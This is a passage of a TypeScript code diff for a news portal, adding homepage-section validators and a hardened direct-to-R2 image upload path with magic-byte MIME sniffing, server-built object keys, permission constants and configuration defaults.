+        message: `config.postsPerCategory must be an integer between 1 and ${CATEGORY_GRID_MAX_POSTS_PER_CATEGORY}.`
+      });
+      return null;
+    }
+
+    postsPerCategory = record.postsPerCategory;
+  }
+
+  return {
+    categorySlugs: record.categorySlugs.map((slug) => (slug as string).trim()),
+    postsPerCategory
+  };
+}
+
+function validateGalleryBlockConfig(
+  record: Record<string, unknown>,
+  errors: ValidationError[]
+): GalleryBlockSectionConfig | null {
+  if (
+    !isUuidArray(record.mediaObjectIds) ||
+    record.mediaObjectIds.length < GALLERY_MIN_ITEMS ||
+    record.mediaObjectIds.length > GALLERY_MAX_ITEMS
+  ) {
+    errors.push({
+      field: "config.mediaObjectIds",
+      message: `config.mediaObjectIds is required and must be an array of ${GALLERY_MIN_ITEMS}-${GALLERY_MAX_ITEMS} UUIDs.`
+    });
+    return null;
+  }
+
+  let caption: string | null = null;
+
+  if (record.caption !== undefined && record.caption !== null) {
+    if (!isNonEmptyString(record.caption)) {
+      errors.push({
+        field: "config.caption",
+        message: "config.caption must be a non-empty string when provided."
+      });
+      return null;
+    }
+
+    caption = record.caption.trim();
+  }
+
+  return { mediaObjectIds: record.mediaObjectIds, caption };
+}
+
+/** Discriminated `config` validator — the ONLY place a `sectionType` is mapped to its allowed `config_json` shape. `rawConfig` must already be a plain object (checked by the caller). */
+export function validateHomepageSectionConfig(
+  sectionType: HomepageSectionType,
+  rawConfig: unknown,
+  errors: ValidationError[]
+): Record<string, unknown> | null {
+  const record = (
+    typeof rawConfig === "object" &&
+    rawConfig !== null &&
+    !Array.isArray(rawConfig)
+      ? rawConfig
+      : {}
+  ) as Record<string, unknown>;
+
+  switch (sectionType) {
+    case "headline":
+      return validateHeadlineConfig(record, errors);
+    case "latest_posts":
+      return validateLatestPostsConfig(record, errors);
+    case "featured_posts":
+    case "editor_picks":
+      return validateCuratedPostsConfig(record, errors);
+    case "category_grid":
+      return validateCategoryGridConfig(record, errors);
+    case "gallery_block":
+      return validateGalleryBlockConfig(record, errors);
+    default:
+      return null;
+  }
+}
+
+function parseOptionalDate(
+  value: unknown,
+  field: string,
+  errors: ValidationError[]
+): Date | null {
+  if (value === undefined || value === null) {
+    return null;
+  }
+
+  if (typeof value !== "string") {
+    errors.push({
+      field,
+      message: `${field} must be an ISO 8601 datetime string.`
+    });
+    return null;
+  }
+
+  const parsed = new Date(value);
+
+  if (Number.isNaN(parsed.getTime())) {
+    errors.push({
+      field,
+      message: `${field} must be a valid ISO 8601 datetime.`
+    });
+    return null;
+  }
+
+  return parsed;
+}
+
+export type CreateHomepageSectionInput = {
+  sectionKey: string;
+  sectionType: HomepageSectionType;
+  title: string | null;
+  config: Record<string, unknown>;
+  sortOrder: number;
+  isEnabled: boolean;
+  startsAt: Date | null;
+  endsAt: Date | null;
+};
+
+export type CreateHomepageSectionValidationResult =
+  | { valid: true; value: CreateHomepageSectionInput }
+  | { valid: false; errors: ValidationError[] };
+
+export function validateCreateHomepageSectionInput(
+  body: unknown
+): CreateHomepageSectionValidationResult {
+  const record = (body ?? {}) as Record<string, unknown>;
+  const errors: ValidationError[] = [];
+
+  if (
+    !isNonEmptyString(record.sectionKey) ||
+    !SECTION_KEY_PATTERN.test(record.sectionKey.trim())
+  ) {
+    errors.push({
+      field: "sectionKey",
+      message:
+        "sectionKey is required and must match ^[a-z0-9][a-z0-9_-]{0,63}$."
+    });
+  }
+
+  if (!isHomepageSectionType(record.sectionType)) {
+    errors.push({
+      field: "sectionType",
+      message: `sectionType must be one of ${HOMEPAGE_SECTION_TYPES.join(", ")}.`
+    });
+  }
+
+  let title: string | null = null;
+
+  if (record.title !== undefined && record.title !== null) {
+    if (typeof record.title !== "string") {
+      errors.push({ field: "title", message: "title must be a string." });
+    } else {
+      title = record.title.trim() || null;
+    }
+  }
+
+  let sortOrder = 0;
+
+  if (record.sortOrder !== undefined) {
+    if (
+      typeof record.sortOrder !== "number" ||
+      !Number.isInteger(record.sortOrder)
+    ) {
+      errors.push({
+        field: "sortOrder",
+        message: "sortOrder must be an integer."
+      });
+    } else {
+      sortOrder = record.sortOrder;
+    }
+  }
+
+  const startsAt = parseOptionalDate(record.startsAt, "startsAt", errors);
+  const endsAt = parseOptionalDate(record.endsAt, "endsAt", errors);
+
+  if (startsAt && endsAt && endsAt <= startsAt) {
+    errors.push({ field: "endsAt", message: "endsAt must be after startsAt." });
+  }
+
+  let config: Record<string, unknown> | null = null;
+
+  if (isHomepageSectionType(record.sectionType)) {
+    config = validateHomepageSectionConfig(
+      record.sectionType,
+      record.config,
+      errors
+    );
+  }
+
+  if (
+    errors.length > 0 ||
+    !config ||
+    !isHomepageSectionType(record.sectionType)
+  ) {
+    return { valid: false, errors };
+  }
+
+  return {
+    valid: true,
+    value: {
+      sectionKey: record.sectionKey as string,
+      sectionType: record.sectionType,
+      title,
+      config,
+      sortOrder,
+      isEnabled: record.isEnabled !== false,
+      startsAt,
+      endsAt
+    }
+  };
+}
+
+export type UpdateHomepageSectionInput = {
+  title?: string | null;
+  config?: Record<string, unknown>;
+  sortOrder?: number;
+  isEnabled?: boolean;
+  startsAt?: Date | null;
+  endsAt?: Date | null;
+};
+
+export type UpdateHomepageSectionValidationResult =
+  | { valid: true; value: UpdateHomepageSectionInput }
+  | { valid: false; errors: ValidationError[] };
+
+/** `currentSectionType` — the existing row's immutable type, supplied by the caller (`homepage-section-directory.ts`'s `updateHomepageSection`, which fetches the row first) — `config`, when present in the request, is validated against THIS type; a request cannot change `sectionType`. */
+export function validateUpdateHomepageSectionInput(
+  body: unknown,
+  currentSectionType: HomepageSectionType
+): UpdateHomepageSectionValidationResult {
+  const record = (body ?? {}) as Record<string, unknown>;
+  const errors: ValidationError[] = [];
+  const value: UpdateHomepageSectionInput = {};
+
+  if (
+    record.sectionType !== undefined &&
+    record.sectionType !== currentSectionType
+  ) {
+    errors.push({
+      field: "sectionType",
+      message: "sectionType cannot be changed after creation."
+    });
+  }
+
+  if (record.title !== undefined) {
+    if (record.title !== null && typeof record.title !== "string") {
+      errors.push({
+        field: "title",
+        message: "title must be a string or null."
+      });
+    } else {
+      value.title =
+        typeof record.title === "string" ? record.title.trim() || null : null;
+    }
+  }
+
+  if (record.sortOrder !== undefined) {
+    if (
+      typeof record.sortOrder !== "number" ||
+      !Number.isInteger(record.sortOrder)
+    ) {
+      errors.push({
+        field: "sortOrder",
+        message: "sortOrder must be an integer."
+      });
+    } else {
+      value.sortOrder = record.sortOrder;
+    }
+  }
+
+  if (record.isEnabled !== undefined) {
+    if (typeof record.isEnabled !== "boolean") {
+      errors.push({
+        field: "isEnabled",
+        message: "isEnabled must be a boolean."
+      });
+    } else {
+      value.isEnabled = record.isEnabled;
+    }
+  }
+
+  if (record.startsAt !== undefined) {
+    value.startsAt = parseOptionalDate(record.startsAt, "startsAt", errors);
+  }
+
+  if (record.endsAt !== undefined) {
+    value.endsAt = parseOptionalDate(record.endsAt, "endsAt", errors);
+  }
+
+  if (
+    value.startsAt !== undefined &&
+    value.endsAt !== undefined &&
+    value.startsAt &&
+    value.endsAt &&
+    value.endsAt <= value.startsAt
+  ) {
+    errors.push({ field: "endsAt", message: "endsAt must be after startsAt." });
+  }
+
+  if (record.config !== undefined) {
+    const config = validateHomepageSectionConfig(
+      currentSectionType,
+      record.config,
+      errors
+    );
+
+    if (config) {
+      value.config = config;
+    }
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true, value };
+}

--- a/src/modules/news-portal/domain/news-media-finalize-decision.ts
+++ b/src/modules/news-portal/domain/news-media-finalize-decision.ts
@@ -1,0 +1,75 @@
+/**
+ * Pure decision logic for the `finalize` step of the direct-to-R2 presigned
+ * upload flow (Issue #634, epic `news_portal`). No I/O — the caller
+ * (`application/news-media-r2-verification.ts`) has already done the real
+ * `HEAD`/`GET` against R2 and the MIME sniffing/checksum computation; this
+ * function only classifies the already-computed facts.
+ *
+ * Order follows `full-online-r2-architecture.md` §9 exactly (size is checked
+ * earlier by the caller, from the `HEAD` result, before the full `GET` even
+ * happens — see that module's own header comment for why): MIME sniffing
+ * result against the allow-list, then against the client's claimed
+ * `mimeType`, then (only if the client supplied one) the checksum claim
+ * against the server-computed checksum. A checksum mismatch alone never
+ * overrides a passing MIME sniff into a MIME acceptance and vice versa —
+ * every check must pass (`full-online-r2-architecture.md` §9 point 6,
+ * "defense in depth... tidak ada langkah yang dilewati").
+ */
+
+export type NewsMediaFinalizeRejectionReason =
+  | "mime_not_recognized"
+  | "mime_not_allowed"
+  | "mime_mismatch"
+  | "checksum_mismatch";
+
+export type NewsMediaFinalizeDecision =
+  | { accepted: true }
+  | { accepted: false; reason: NewsMediaFinalizeRejectionReason };
+
+export type NewsMediaFinalizeDecisionInput = {
+  /** `mimeType` claimed when the upload session was created (step 1). */
+  claimedMimeType: string;
+  /** The deployment's configured allow-list (`news-media-r2-config.ts`). */
+  allowedMimeTypes: string[];
+  /**
+   * Result of `sniffNewsMediaMimeType` against the bytes actually read from
+   * R2 — `undefined` when the content matches no recognized image
+   * signature (this is exactly what an HTML/JS payload disguised with a
+   * `.jpg` name/claimed mime type sniffs to).
+   */
+  sniffedMimeType: string | undefined;
+  /**
+   * Optional client-claimed checksum from the finalize request. Per §9,
+   * this is used ONLY to detect transport corruption — never as a
+   * substitute for the MIME sniff above.
+   */
+  claimedChecksumSha256: string | null;
+  /** SHA-256 computed server-side from the bytes actually read from R2. */
+  computedChecksumSha256: string;
+};
+
+export function decideNewsMediaFinalizeOutcome(
+  input: NewsMediaFinalizeDecisionInput
+): NewsMediaFinalizeDecision {
+  if (!input.sniffedMimeType) {
+    return { accepted: false, reason: "mime_not_recognized" };
+  }
+
+  if (!input.allowedMimeTypes.includes(input.sniffedMimeType)) {
+    return { accepted: false, reason: "mime_not_allowed" };
+  }
+
+  if (input.sniffedMimeType !== input.claimedMimeType.toLowerCase().trim()) {
+    return { accepted: false, reason: "mime_mismatch" };
+  }
+
+  if (
+    input.claimedChecksumSha256 &&
+    input.claimedChecksumSha256.toLowerCase() !==
+      input.computedChecksumSha256.toLowerCase()
+  ) {
+    return { accepted: false, reason: "checksum_mismatch" };
+  }
+
+  return { accepted: true };
+}

--- a/src/modules/news-portal/domain/news-media-mime-sniffer.ts
+++ b/src/modules/news-portal/domain/news-media-mime-sniffer.ts
@@ -1,0 +1,76 @@
+/**
+ * MIME sniffing from magic bytes (Issue #634, epic `news_portal`). Pure — no
+ * network/DB access, takes only the bytes already read from R2 by the
+ * caller (`application/news-media-r2-verification.ts`).
+ *
+ * ## Why allow-list sniffing, not a generic magic-byte detector
+ *
+ * `full-online-r2-architecture.md` §9 and the security-auditor finding on
+ * Issue #631 (the finding this whole issue exists to close) require the
+ * `confirm`/finalize step to run MIME sniffing against the object's actual
+ * bytes rather than trust `Content-Type`, the file extension, or the
+ * client's claimed `mimeType` — none of those are proof of what the bytes
+ * actually are. This module only tries to POSITIVELY recognize the four
+ * mime types `news-media-r2-config.ts` allows by default (JPEG/PNG/WebP/
+ * GIF). Anything else — including a `.jpg`-named/labeled file that is
+ * actually HTML/JS (the exact exploit scenario the security audit called
+ * out) — returns `undefined` ("not a recognized image"), which
+ * `news-media-finalize-decision.ts` always treats as a hard reject. This is
+ * deliberately allow-list-only (not a blocklist trying to enumerate every
+ * dangerous format) — a payload sniffing to `undefined` is rejected
+ * regardless of what it actually is.
+ */
+
+export type SniffedNewsMediaMimeType =
+  "image/jpeg" | "image/png" | "image/webp" | "image/gif";
+
+const JPEG_MAGIC = [0xff, 0xd8, 0xff];
+const PNG_MAGIC = [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a];
+const GIF_MAGIC_PREFIX = [0x47, 0x49, 0x46, 0x38]; // "GIF8"
+const GIF_VERSION_A = 0x61; // "a" — closes "87a"/"89a"
+const RIFF_MAGIC = [0x52, 0x49, 0x46, 0x46]; // "RIFF"
+const WEBP_MAGIC = [0x57, 0x45, 0x42, 0x50]; // "WEBP", at byte offset 8
+
+function matchesAt(
+  bytes: Uint8Array,
+  offset: number,
+  signature: number[]
+): boolean {
+  if (bytes.length < offset + signature.length) return false;
+
+  for (let i = 0; i < signature.length; i += 1) {
+    if (bytes[offset + i] !== signature[i]) return false;
+  }
+
+  return true;
+}
+
+/**
+ * Returns the recognized mime type for `bytes`, or `undefined` when the
+ * content does not match any allow-listed image signature. Never throws.
+ */
+export function sniffNewsMediaMimeType(
+  bytes: Uint8Array
+): SniffedNewsMediaMimeType | undefined {
+  if (matchesAt(bytes, 0, JPEG_MAGIC)) {
+    return "image/jpeg";
+  }
+
+  if (matchesAt(bytes, 0, PNG_MAGIC)) {
+    return "image/png";
+  }
+
+  if (
+    matchesAt(bytes, 0, GIF_MAGIC_PREFIX) &&
+    (bytes[4] === 0x37 || bytes[4] === 0x39) &&
+    bytes[5] === GIF_VERSION_A
+  ) {
+    return "image/gif";
+  }
+
+  if (matchesAt(bytes, 0, RIFF_MAGIC) && matchesAt(bytes, 8, WEBP_MAGIC)) {
+    return "image/webp";
+  }
+
+  return undefined;
+}

--- a/src/modules/news-portal/domain/news-media-object-key.ts
+++ b/src/modules/news-portal/domain/news-media-object-key.ts
@@ -1,0 +1,157 @@
+/**
+ * Object key convention + trusted public URL construction for the R2-only
+ * news media registry (Issue #633, epic `news_portal`). Pure — no network/DB
+ * access, no `process.env` reads (callers pass in `NewsMediaR2Config` from
+ * `news-media-r2-config.ts`).
+ *
+ * Format, EXACTLY as `docs/awcms-mini/news-portal/full-online-r2-architecture.md`
+ * §6 mandates:
+ *
+ *   news-media/{tenantId}/{yyyy}/{mm}/{uuid}.{ext}
+ *
+ * - `tenantId` — the tenant UUID (never the human-readable `tenantCode`).
+ * - `{yyyy}/{mm}` — upload-date partition (server clock, not client input).
+ * - `{uuid}` — `crypto.randomUUID()` (Bun-native), the only component that
+ *   uniquely identifies the object. Never the client's original filename,
+ *   an article title, or any other client-supplied text — this is what
+ *   makes the key unguessable (mitigates the residual risk in doc §8: a
+ *   `pending_upload` row is not itself an access control) and prevents path
+ *   traversal / unsafe-character / information-leak issues a raw filename
+ *   would introduce.
+ * - `{ext}` — derived from the SERVER-VALIDATED mime type (doc §6/§9), never
+ *   from the client's original file extension. This is what closes the
+ *   "file.jpg that is actually HTML/PHP" spoofing gap.
+ *
+ * `original_filename` is stored as its own metadata column (never part of
+ * the key) purely for editor-facing display.
+ */
+
+const UUID_PATTERN =
+  /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
+
+/**
+ * Extension map for the mime types `news-media-r2-config.ts` allows by
+ * default. Deliberately explicit (no generic `mime.split("/")[1]` fallback)
+ * — if an operator ever widens `NEWS_MEDIA_R2_ALLOWED_MIME_TYPES` to a mime
+ * type not listed here, `deriveExtensionFromMimeType` must fail loudly
+ * (forcing this map to be extended deliberately) rather than silently
+ * deriving an unreviewed extension from the mime subtype string.
+ */
+const MIME_TYPE_TO_EXTENSION: Record<string, string> = {
+  "image/jpeg": "jpg",
+  "image/png": "png",
+  "image/webp": "webp",
+  "image/gif": "gif"
+};
+
+/** `undefined` when `mimeType` has no known-safe extension mapping. */
+export function deriveExtensionFromMimeType(
+  mimeType: string
+): string | undefined {
+  return MIME_TYPE_TO_EXTENSION[mimeType.toLowerCase().trim()];
+}
+
+function pad2(value: number): string {
+  return value.toString().padStart(2, "0");
+}
+
+export type BuildNewsMediaObjectKeyInput = {
+  tenantId: string;
+  mimeType: string;
+  /** Defaults to `crypto.randomUUID()` — override only from tests. */
+  uuid?: string;
+  /** Defaults to `new Date()` — override only from tests. */
+  now?: Date;
+};
+
+export class UnsupportedNewsMediaMimeTypeError extends Error {
+  constructor(mimeType: string) {
+    super(
+      `No object-key extension mapping for mime type "${mimeType}" — add it to MIME_TYPE_TO_EXTENSION in news-media-object-key.ts deliberately before allowing it.`
+    );
+    this.name = "UnsupportedNewsMediaMimeTypeError";
+  }
+}
+
+/**
+ * Builds a fresh, server-generated object key. Throws
+ * `UnsupportedNewsMediaMimeTypeError` for any mime type without a reviewed
+ * extension mapping — callers must validate `mimeType` against the
+ * configured allow-list (`NewsMediaR2Config.allowedMimeTypes`) BEFORE
+ * calling this, this is a second, structural line of defense, not the
+ * primary check.
+ */
+export function buildNewsMediaObjectKey(
+  input: BuildNewsMediaObjectKeyInput
+): string {
+  const ext = deriveExtensionFromMimeType(input.mimeType);
+  if (!ext) {
+    throw new UnsupportedNewsMediaMimeTypeError(input.mimeType);
+  }
+
+  const now = input.now ?? new Date();
+  const uuid = input.uuid ?? crypto.randomUUID();
+  const yyyy = now.getUTCFullYear().toString();
+  const mm = pad2(now.getUTCMonth() + 1);
+
+  return `news-media/${input.tenantId}/${yyyy}/${mm}/${uuid}.${ext}`;
+}
+
+/**
+ * Validates that `objectKey` matches the full §6 format AND belongs to
+ * `tenantId` — used both to sanity-check keys this module generated and to
+ * reject any object key supplied from outside (e.g. a confirm step payload
+ * in #634) that doesn't match the server-generated shape/prefix.
+ */
+export function isValidNewsMediaObjectKey(
+  tenantId: string,
+  objectKey: string
+): boolean {
+  const escapedTenantId = tenantId.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
+  const pattern = new RegExp(
+    `^news-media/${escapedTenantId}/\\d{4}/\\d{2}/[0-9a-f-]{36}\\.[a-z0-9]+$`,
+    "i"
+  );
+
+  if (!pattern.test(objectKey)) return false;
+
+  const uuidSegment = objectKey.split("/").pop()?.split(".")[0] ?? "";
+  return UUID_PATTERN.test(uuidSegment);
+}
+
+export class UntrustedNewsMediaPublicBaseUrlError extends Error {
+  constructor(publicBaseUrl: string) {
+    super(
+      `NEWS_MEDIA_R2_PUBLIC_BASE_URL must be an absolute https URL, got: "${publicBaseUrl}".`
+    );
+    this.name = "UntrustedNewsMediaPublicBaseUrlError";
+  }
+}
+
+/**
+ * Builds the public URL for a media object strictly from the trusted,
+ * server-side-configured `publicBaseUrl` (`NEWS_MEDIA_R2_PUBLIC_BASE_URL`,
+ * Issue #632's config resolver) and a server-generated `objectKey` — NEVER
+ * from any client-supplied URL/host. Rejects a malformed/non-https base URL
+ * rather than silently building an unsafe link (defense in depth; the base
+ * URL itself is also checked by `scripts/validate-env.ts`'s
+ * `isHttpsAbsoluteUrl` at config-validate time).
+ */
+export function buildNewsMediaPublicUrl(
+  publicBaseUrl: string,
+  objectKey: string
+): string {
+  let parsed: URL;
+  try {
+    parsed = new URL(publicBaseUrl);
+  } catch {
+    throw new UntrustedNewsMediaPublicBaseUrlError(publicBaseUrl);
+  }
+
+  if (parsed.protocol !== "https:") {
+    throw new UntrustedNewsMediaPublicBaseUrlError(publicBaseUrl);
+  }
+
+  const trimmedBase = publicBaseUrl.replace(/\/+$/, "");
+  return `${trimmedBase}/${objectKey}`;
+}

--- a/src/modules/news-portal/domain/news-media-permissions.ts
+++ b/src/modules/news-portal/domain/news-media-permissions.ts
@@ -1,0 +1,62 @@
+/**
+ * Permission KEY CONSTANTS for the R2-only news media registry (Issue #633).
+ * These are documentation/constants ONLY — this file does not touch
+ * `module.ts`'s `permissions` array and does not insert any row into
+ * `awcms_permissions`.
+ *
+ * Why not wired up yet: `news_portal`'s own `module.ts` deliberately leaves
+ * `permissions`/`navigation`/`api`/`settings`/`jobs`/`health` undeclared
+ * until the corresponding feature is real (same convention `visitor_analytics`
+ * used, Issue #617; see `module.ts`'s own descriptor comment). Issue #633
+ * adds domain/application helpers only — no HTTP endpoint exists yet to
+ * enforce these permissions, so declaring them in the module descriptor now
+ * would sync permission rows into `awcms_permissions` with nothing
+ * that ever checks them, which is misleading (a permission that "exists"
+ * but is unreachable). Issue #634 (direct-to-R2 presigned upload flow) is
+ * expected to be the first issue that adds real endpoints — it MUST reuse
+ * these exact string constants (not invent new ones) when declaring
+ * `module.ts`'s `permissions` array and calling `authorizeInTransaction`
+ * (skill `awcms-abac-guard`).
+ *
+ * `activityCode` follows this module's own resource shape (`media`, plural
+ * dropped to match e.g. `blog_content`'s `posts`/`pages` activity codes),
+ * `action` follows the same verb set already used elsewhere in this repo for
+ * a soft-deletable resource with an attach/detach lifecycle
+ * (`blog_content`'s `posts.create`/`.update`/`.delete`/`.restore`/`.purge`).
+ */
+export const NEWS_MEDIA_PERMISSION_ACTIVITY_CODE = "media";
+
+export const NEWS_MEDIA_PERMISSIONS = {
+  /** Create a pending media object metadata record (also gates starting a presigned upload session, Issue #634). */
+  create: "news_portal.media.create",
+  /** Read media object metadata (list/detail). */
+  read: "news_portal.media.read",
+  /** Mark an uploaded object verified (MIME/checksum/dimension check passed) — also gates the finalize endpoint, Issue #634. */
+  verify: "news_portal.media.verify",
+  /** Attach a verified media object to an owning blog/news resource. */
+  attach: "news_portal.media.attach",
+  /** Detach a media object from its current owning resource. */
+  detach: "news_portal.media.detach",
+  /** Soft delete media object metadata. */
+  delete: "news_portal.media.delete",
+  /** Restore a soft-deleted media object. */
+  restore: "news_portal.media.restore",
+  /** Hard purge an already soft-deleted media object. */
+  purge: "news_portal.media.purge",
+  /**
+   * Abort one's own not-yet-uploaded upload session (Issue #634). New in
+   * this issue — #633's original set (create/read/verify/attach/detach/
+   * delete/restore/purge) had no "cancel" concept yet because no upload
+   * session existed. Reuses the existing `AccessAction` union member
+   * `"cancel"` (`identity-access/domain/access-control.ts`, already used by
+   * sync/POS cancel flows) — a distinct permission from `delete` because
+   * cancelling a `pending_upload` session (nothing was ever verified/
+   * attached) is a materially lower-risk action than soft-deleting a real,
+   * previously-verified media object.
+   */
+  cancel: "news_portal.media.cancel"
+} as const;
+
+export type NewsMediaPermissionKey = keyof typeof NEWS_MEDIA_PERMISSIONS;
+export type NewsMediaPermissionValue =
+  (typeof NEWS_MEDIA_PERMISSIONS)[NewsMediaPermissionKey];

--- a/src/modules/news-portal/domain/news-media-r2-config.ts
+++ b/src/modules/news-portal/domain/news-media-r2-config.ts
@@ -1,0 +1,392 @@
+/**
+ * `NEWS_MEDIA_R2_*` configuration gate (Issue #632, epic `news_portal`
+ * #631-#642/#649). Pure — no `process.env` reads here; callers
+ * (`scripts/validate-env.ts`, `scripts/security-readiness.ts`,
+ * `application/apply-news-portal-preset.ts`) pass in whatever `env` they
+ * were given. Same split as `visitor-analytics/domain/visitor-analytics-config.ts`
+ * and `email/domain/email-config.ts`.
+ *
+ * ## Naming — a deliberate deviation from Issue #632's own body text
+ *
+ * Issue #632's body literally lists `CLOUDFLARE_ACCOUNT_ID`,
+ * `R2_ACCESS_KEY_ID`, `R2_SECRET_ACCESS_KEY`, `R2_NEWS_IMAGE_BUCKET`,
+ * `R2_NEWS_IMAGE_PUBLIC_BASE_URL`, etc. **This file intentionally does
+ * NOT use those names.** `R2_ACCESS_KEY_ID`/`R2_SECRET_ACCESS_KEY` are the
+ * EXACT names `sync-storage` already uses (`object-storage-uploader.ts`,
+ * Issue #436) for its own, unrelated, *private* object queue bucket. Reusing
+ * them here would make news-portal media and sync-storage share literally
+ * the same credential — precisely the single-point-of-compromise risk
+ * Issue #631's architecture doc was written to prevent (see
+ * `docs/awcms-mini/news-portal/full-online-r2-architecture.md` §2,
+ * "Keputusan kunci #1" in `.claude/skills/awcms-news-portal/SKILL.md`).
+ *
+ * Every var below instead follows §4 of that document EXACTLY as written
+ * there (`NEWS_MEDIA_R2_*` prefix) — this is the authoritative source, not
+ * the issue body. Note the architecture doc's §4 table does NOT include a
+ * separate `NEWS_MEDIA_R2_CUSTOM_DOMAIN` var (§11 clarifies
+ * `NEWS_MEDIA_R2_PUBLIC_BASE_URL` already IS the custom-domain URL) — this
+ * file follows the doc, not a broader reading of the issue body.
+ */
+
+export const NEWS_MEDIA_R2_DEFAULT_ALLOWED_MIME_TYPES = [
+  "image/jpeg",
+  "image/png",
+  "image/webp",
+  "image/gif"
+] as const;
+
+/** SVG is deliberately excluded by default — see architecture doc §9 (XSS via embedded `<script>`). */
+export const NEWS_MEDIA_R2_DISALLOWED_MIME_TYPE_DEFAULT = "image/svg+xml";
+
+/**
+ * Every MIME type this codebase actually knows how to reason about for
+ * `NEWS_MEDIA_R2_ALLOWED_MIME_TYPES` (Issue #635): the four raster types
+ * `news-media-mime-sniffer.ts` can sniff from magic bytes, PLUS
+ * `image/svg+xml` (excluded by default above, but a real, deliberate
+ * override path exists for it — `checkNewsMediaR2SvgNotAllowed`,
+ * `scripts/security-readiness.ts` — so it belongs in the "known" set, not
+ * the "unknown/unsafe" one). An operator listing anything OUTSIDE this set
+ * (`text/html`, `application/octet-stream`, a typo, ...) has misconfigured
+ * the allow-list: the sniffer can never accept such an upload (every real
+ * upload would fail-safe reject at `finalize`), so config:validate treats
+ * it as a hard error rather than a silent no-op, per Issue #635's
+ * acceptance criteria ("Allowed MIME types include unsafe/non-image
+ * types").
+ */
+export const NEWS_MEDIA_R2_KNOWN_MIME_TYPES = [
+  ...NEWS_MEDIA_R2_DEFAULT_ALLOWED_MIME_TYPES,
+  NEWS_MEDIA_R2_DISALLOWED_MIME_TYPE_DEFAULT
+] as const;
+
+/**
+ * Upper bound for `NEWS_MEDIA_R2_PRESIGNED_UPLOAD_TTL_SECONDS` (Issue #635).
+ * Architecture doc §8 describes the default (300s/5min) as "short-lived —
+ * enough for one interactive upload, too short to be useful to a leaked
+ * URL long after being generated." A presigned PUT URL is not single-use
+ * (§8's own residual-risk note), so the whole TTL-based mitigation
+ * degrades the longer the window is — 1 hour is a generous ceiling that
+ * still keeps that property meaningful (an operator who needs longer has a
+ * different problem, e.g. a slow client upload path, not a config this
+ * check should silently accommodate).
+ */
+export const NEWS_MEDIA_R2_MAX_PRESIGNED_UPLOAD_TTL_SECONDS = 3600;
+
+/**
+ * Floor for `NEWS_MEDIA_R2_ORPHAN_GRACE_DAYS` (Issue #690,
+ * `r2-backup-lifecycle.md` §3: "Masa tenggang minimum 30 hari sebelum hapus
+ * fisik, dapat dikonfigurasi operator"). Unlike
+ * `NEWS_MEDIA_R2_MAX_PRESIGNED_UPLOAD_TTL_SECONDS` (a ceiling), this is a
+ * FLOOR — the doc's own "minimum 30 hari" language, not a suggested default
+ * an operator is free to shrink arbitrarily. `isOrphanGraceTooShort` reports
+ * a value below this as unsafe (`security:readiness`, warning severity —
+ * same non-blocking-but-flagged pattern as `isPresignedUploadTtlTooLong`).
+ */
+export const NEWS_MEDIA_R2_MIN_ORPHAN_GRACE_DAYS = 30;
+
+export const NEWS_MEDIA_R2_DEFAULTS = {
+  enabled: false,
+  presignedUploadTtlSeconds: 300,
+  maxUploadBytes: 10_485_760,
+  allowedMimeTypes: [...NEWS_MEDIA_R2_DEFAULT_ALLOWED_MIME_TYPES] as string[],
+  pendingTtlMinutes: 60,
+  orphanGraceDays: NEWS_MEDIA_R2_MIN_ORPHAN_GRACE_DAYS
+} as const;
+
+/**
+ * Required only when `NEWS_MEDIA_R2_ENABLED=true` — mirrors
+ * `R2_REQUIRED_WHEN_ENABLED` in `scripts/validate-env.ts` (the existing
+ * `sync-storage` R2 conditional check), same shape, different var names,
+ * one extra key (`NEWS_MEDIA_R2_PUBLIC_BASE_URL` — news media is public by
+ * design, sync-storage's bucket never is, so it has no public-base-URL
+ * concept at all).
+ */
+export const NEWS_MEDIA_R2_REQUIRED_WHEN_ENABLED = [
+  "NEWS_MEDIA_R2_ACCOUNT_ID",
+  "NEWS_MEDIA_R2_ACCESS_KEY_ID",
+  "NEWS_MEDIA_R2_SECRET_ACCESS_KEY",
+  "NEWS_MEDIA_R2_BUCKET",
+  "NEWS_MEDIA_R2_PUBLIC_BASE_URL"
+] as const;
+
+export type NewsMediaR2Config = {
+  enabled: boolean;
+  accountId: string;
+  accessKeyId: string;
+  secretAccessKey: string;
+  bucket: string;
+  publicBaseUrl: string;
+  presignedUploadTtlSeconds: number;
+  maxUploadBytes: number;
+  allowedMimeTypes: string[];
+  pendingTtlMinutes: number;
+  /** Grace period (days) between a media object becoming `orphaned` and `scripts/news-media-r2-reconcile.ts` (Issue #690) physically deleting its R2 object + soft-deleting its metadata row (`r2-backup-lifecycle.md` §3). Also reused as the age threshold (against the R2-reported `lastModified`) before that same job will physically delete an "orphan-in-R2" object (a bucket object with no matching metadata row at all — see that script's own header for why one config knob covers both cases). */
+  orphanGraceDays: number;
+};
+
+function isSet(value: string | undefined): boolean {
+  return typeof value === "string" && value.trim().length > 0;
+}
+
+function parseBoolean(value: string | undefined, fallback: boolean): boolean {
+  if (!isSet(value)) return fallback;
+  return value === "true";
+}
+
+/** `undefined` when unset/blank/non-positive-integer — never throws, never NaN. */
+export function parsePositiveInt(
+  value: string | undefined
+): number | undefined {
+  if (!isSet(value)) return undefined;
+
+  const trimmed = (value as string).trim();
+
+  if (!/^\d+$/.test(trimmed)) return undefined;
+
+  const parsed = Number.parseInt(trimmed, 10);
+
+  return parsed > 0 ? parsed : undefined;
+}
+
+function parseMimeList(value: string | undefined): string[] {
+  if (!isSet(value)) return [...NEWS_MEDIA_R2_DEFAULTS.allowedMimeTypes];
+
+  return (value as string)
+    .split(",")
+    .map((entry) => entry.trim().toLowerCase())
+    .filter((entry) => entry.length > 0);
+}
+
+/**
+ * Resolves the full config from `env`, falling back to
+ * `NEWS_MEDIA_R2_DEFAULTS` for anything unset/malformed. Never throws —
+ * malformed values are reported by `checkNewsMediaR2Config`
+ * (`scripts/validate-env.ts`), not here.
+ */
+export function resolveNewsMediaR2Config(
+  env: NodeJS.ProcessEnv = process.env
+): NewsMediaR2Config {
+  return {
+    enabled: parseBoolean(
+      env.NEWS_MEDIA_R2_ENABLED,
+      NEWS_MEDIA_R2_DEFAULTS.enabled
+    ),
+    accountId: env.NEWS_MEDIA_R2_ACCOUNT_ID ?? "",
